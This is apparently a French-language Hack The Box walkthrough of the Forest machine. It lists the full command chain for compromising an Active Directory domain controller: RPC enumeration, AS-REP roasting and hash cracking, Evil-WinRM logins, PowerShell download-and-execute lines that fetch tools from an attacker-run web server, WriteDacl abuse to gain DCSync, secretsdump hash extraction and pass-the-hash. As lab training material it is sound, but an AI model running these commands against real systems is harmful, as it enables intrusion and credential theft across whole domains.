Forest HackTheBox (Writeup)

Skills:

AXFR - Domain Zone Transfer Attack (Failed)
RPC Enumeration - Getting valid domain users
Performing an AS-RepRoast attack with the obtained users
Cracking Hashes
Abusing WinRM - EvilWinRM
Ldap Enumeration - ldapdomaindump
BloodHound Enumeration
Gathering system information with SharpHound.ps1 - PuckieStyle
Representing and visualizing data in BloodHound
Finding an attack vector in BloodHound
Abusing Account Operators Group - Creating a new user
Abusing Account Operators Group - Assigning a group to the newly created user
Abusing WriteDacl in the domain - Granting DCSync Privileges
DCSync Exploitation - Secretsdump.py

Reconnaissance:

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.10.161 -oG allPorts

Analyse des ports ouverts avec extractport : Utilisation de la fonction extractport pour afficher de manière synthétique les ports ouverts et les copier dans le presse-papiers.

Scan de la version des ports avec Nmap : Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49671,49676,49677,49682,49705,49914 10.10.10.161 -oN targeted

Énumération et Exploitation:

Reconnaissance SMB:

Utilisation de CrackMapExec pour identifier le système d'exploitation

crackmapexec cmb 10.10.10.161

Pour résoudre les noms de domaine en adresses IP via DNS, on insère dans le fichier /etc/hosts le nom de domaine associé à son adresse IP

Exploration des partages SMB sur le réseau pour identifier les ressources partagées mais aucun resultat.

crackmapexec smb 10.10.10.161 --shares

smbclient -L 10.10.10.161 -N

Reconnaissance RPC:

Utilisation de rpcclient pour interagir avec les services RPC et collecter des informations sur les ressources

rpccclient -U "" 10.10.10.161 -N
enumdomusers

Listons les groupes :

rpcclient -U "" 10.10.10.161 -N -c 'enumdomgroups'

ASREPRoast attack:

Disposant d'une liste d'utilisateurs valides, nous procéderons à une attaque AS-RepRoast, car nous n'avons pas besoin des mots de passe des utilisateurs.

Nous allons utiliser grep pour filtrer les noms des utilisateurs, puis insérer ces données dans un fichier

rpcclient -U "" 10.10.10.161 -N -c 'enumdomusers' | grep -oP '\[.*?\]' | grep -v 0x | tr -d '[]' > users

Nous utilisons l'outil GetNPUsers.py pour extraire les informations sur les utilisateurs sans mot de passe :

GetNPUsers.py htb.local/ -no-pass -usersfile users

Nous récupérons le hash du mot de passe de l'utilisateur "lucinda" et tentons de le casser avec John the Ripper en utilisant une liste de mots de passe prédéfinie :

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Nous utilisons CrackMapExec pour vérifier si le mot de passe craqué est correct en tentant une connexion WinRM :

crackmapexec winrm 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'

Enfin, nous utilisons Evil-WinRM pour nous connecter à la machine distante avec les informations d'identification craquées :

evil-winrm -i 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'

Élévation de privilèges:

Énumération du Domaine avec Bloodhound :

Installation Bloodhound:

apt install neo4j bloodhound
neo4j console &> /dev/null & disown
lsof -i:7474

Connexion à Bloodhound avec les identifiants neo4j:neo4j.

Lancement de Bloodhound.

bloodhound &> /dev/null & disown

Collecte d'informations avec SharpHound.ps1 :

powershell/SharpHound.ps1 at master · puckiestyle/powershellGitHub

Transfert des données collectées vers un serveur Linux.

python3 -m http.server 80

IEX(New-object Net.WebClient).downloadString('http://10.10.14.8/SharpHound.ps1')

Invoke-BloodHound -CollectionMethod All

Nous transférons le fichier zip à notre équipe.

download C:\Users\svc-alfresco\Desktop\bh\20240329121547_BloodHound.zip data.zip

Importation du fichier zip dans Bloodhound.

Analyse et Exploitation BloodHound :

Filtrage des données pour trouver le chemin le plus court vers l'administrateur de domaine.

Identification de l'appartenance à un groupe potentiellement problématique (Account Operator).

Utilisation de la capacité de création d'utilisateurs pour préparer une attaque DCSync.

net user jordanmacia password123$ /add /domain

Tentative de DCSync sans droits suffisants.

impacket-secretsdump htb.local/[email protected]

Ajout de l'utilisateur à un groupe avec des permissions plus élevées (`Exchange Windows Permissions`).

net group "Exchange Windows Permissions" jordanmacia /add

Attaque WriteDACL:

$SecPassword = ConvertTo-SecureString 'password123$' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb.local\jordanmacia', $SecPassword)

Préparation de l'attaque WriteDACL en utilisant PowerView.ps1 pour ajouter une fonctionnalité.

PowerSploit/Recon/PowerView.ps1 at dev · PowerShellMafia/PowerSploitGitHub

Transférer le fichier

python3 -m http.server 80

powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11/PowerView.ps1')"

Vulnérabilité DCSync Attack:

Exécution de la commande Add-DomainObjectAcl pour obtenir les hashs.

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity jordanmacia -Rights DCSync

Utilisation d'Impacket pour extraire les hashs avec l'utilisateur jordanmacia.

impacket-secretsdump htb.local/[email protected]

Pass-the-Hash Attack:

Utilisation du hash NT de l'administrateur pour une attaque Pass-the-Hash.

evil-winrm -i 10.10.10.161 -u 'Administrator' -H '32693b11e6aa90eb43d32c72a07ceea6'

Accès au système avec les droits de l'administrateur.

Flag finale :)

Mis à jour il y a 1 an

hashtagReconnaissance:

hashtagÉnumération et Exploitation:

hashtagReconnaissance SMB:

hashtagReconnaissance RPC:

hashtagListons les groupes :

hashtagASREPRoast attack:

hashtagDisposant d'une liste d'utilisateurs valides, nous procéderons à une attaque AS-RepRoast, car nous n'avons pas besoin des mots de passe des utilisateurs.

hashtagNous utilisons l'outil GetNPUsers.py pour extraire les informations sur les utilisateurs sans mot de passe :

hashtagNous récupérons le hash du mot de passe de l'utilisateur "lucinda" et tentons de le casser avec John the Ripper en utilisant une liste de mots de passe prédéfinie :

hashtagNous utilisons CrackMapExec pour vérifier si le mot de passe craqué est correct en tentant une connexion WinRM :

hashtagEnfin, nous utilisons Evil-WinRM pour nous connecter à la machine distante avec les informations d'identification craquées :

hashtagÉlévation de privilèges:

hashtagÉnumération du Domaine avec Bloodhound :

hashtagCollecte d'informations avec SharpHound.ps1 :

hashtagTransfert des données collectées vers un serveur Linux.

hashtagNous transférons le fichier zip à notre équipe.

hashtagAnalyse et Exploitation BloodHound :

hashtagFiltrage des données pour trouver le chemin le plus court vers l'administrateur de domaine.

hashtagIdentification de l'appartenance à un groupe potentiellement problématique (Account Operator).

hashtagUtilisation de la capacité de création d'utilisateurs pour préparer une attaque DCSync.

hashtagTentative de DCSync sans droits suffisants.

hashtagAjout de l'utilisateur à un groupe avec des permissions plus élevées (Exchange Windows Permissions).

hashtagAttaque WriteDACL:

hashtagTransférer le fichier

hashtagVulnérabilité DCSync Attack:

hashtagExécution de la commande Add-DomainObjectAcl pour obtenir les hashs.

hashtagUtilisation d'Impacket pour extraire les hashs avec l'utilisateur jordanmacia.

hashtagPass-the-Hash Attack:

hashtagAccès au système avec les droits de l'administrateur.

hashtagFlag finale :)